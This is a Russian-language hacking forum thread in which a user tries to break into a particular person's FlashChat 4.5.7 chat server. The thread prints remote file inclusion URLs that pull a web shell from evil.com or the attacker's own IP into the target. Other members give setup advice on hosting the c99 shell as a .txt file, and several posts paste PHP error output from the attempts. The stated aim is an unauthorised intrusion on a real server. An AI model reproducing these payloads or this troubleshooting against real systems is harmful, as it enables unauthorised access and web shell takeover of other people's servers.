Приветствую!!! Вобщем есть такой вопросец хотел нагнуть FlashChat v 4.5.7 нашел баг под него на складе сайта www.milw0rm.com Код: http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt? Видео данной уязвимости: http://rapidshare.de/files/31362430/Flashchat.rar.html ------------------------------------------------------------------------------------------------ Ставлю я значит себе denwer кидаю туда вебшелл с99 и прописываю вот это: http://ип_цель/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://ип_мой/c99.txt? Идет запрос и шелл не хочет грузиться попробоал убрать [inc] На это вебсерв отрыгивает такое: Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12 Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12 Warning: main(hdb.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13 Fatal error: main(): Failed opening required 'hdb.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13 Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом.. может быть в этом дело ?! Т.е его ip даже не пингуется... а как я понял баг работает по принцыпу бэкконекта и возможно фаир рубит это дело на корню.. Вобщем или я туплю или чтото не так делаю Пролейте свет !!!!!! Вопрос в догонку Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!
ну вопервых денвер сначала надо настроить чтобы он смотрел в инет. кидай в директорию c:/webservers/home/your_site/ файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться) содержанием # dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача # dnwr_host custom-host # dnwr_port 80 Файр не файр но он не должен блокировать запрос скрипта на инклуд. файл не должен обрабатываться на сервере где он лежит(иначе инклудиться будет результат выполнения команды на сервере-хранилище). чат инклудя твой тхт считывает его содержимое и помещает в страницу свою вот тама он и будет обрабатываться.
Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html. Не знаю что там может быть непонятного. Пробуй сразу на вебе, не мучай себя и денвер. Кстати эту багу уже почти везде закрыли.
Забыл дополнит что все это в местной сетке adsl в тырнет доступа нет... Но сомо собой я настройил апатчь чтобы он смотрел в сетку с портом 80 но все равно нехочет цеплять шелл. Но настройку я делал не через .htaccess а прописал в httpd.conf есть ли разница ?! Ну может ее много где и закрыли но у етого перца весит именно ета версия и бновлять как я вижу он ее пока не собирается
Пробовал .htaccess создавать неканает вобщем странно както Возможно у него верссия подправленая хз Хотя на запрос chat/inc/cmses/aedating4CMS.php выдает вот это Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12 Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12 Warning: main(db.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13 Fatal error: main(): Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13
Пишет что нету такого файла или дирректории. Админ вполне мог их перенести, и изменить адреса подгружаемых файлов чата.
Мда жаль если так....хотя знаю его навыки в этом деле обычно у него все по дефолту ) Но видать это исключение
Так где пробить это верссию на офф скорей всего новая... Поставить себе и логическим путем подумать что он там мог изменить ) Хотя логики тут маловато будет кто его знает какое ему имя папки взбрело в голову...
Вот что пришло в голову уязвимость скорей всего продемострирована на платной верссии чата а в free версии возможно структура папок другая ?! Порылся чета нема этой версии наврно плохо ищу..
А и на щет этой темы.. Короче че получилось поставил я себе етот чат поробовал провернуть взлом локально Вобщем шелл грузится но както странно толко титульная страница и если пробовать юзать его то выдает следущее Warning: main(o:\home\non-existent-host/inc/header.inc.php) [function.main]: failed to open stream: No such file or directory in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 12 Warning: main() [function.include]: Failed opening 'o:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 12 Notice: Undefined variable: dir in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13 [Денвер: показать возможную причину ошибки] Warning: main(db.inc.php) [function.main]: failed to open stream: No such file or directory in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13 Fatal error: main() [function.require]: Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in o:\home\non-existent-host\chat\inc\cmses\aedatingcms.php on line 13 Я так понимаю что все дело в самой реализации денвера под винду хотя пробовал appwebserv через него такая же фигня
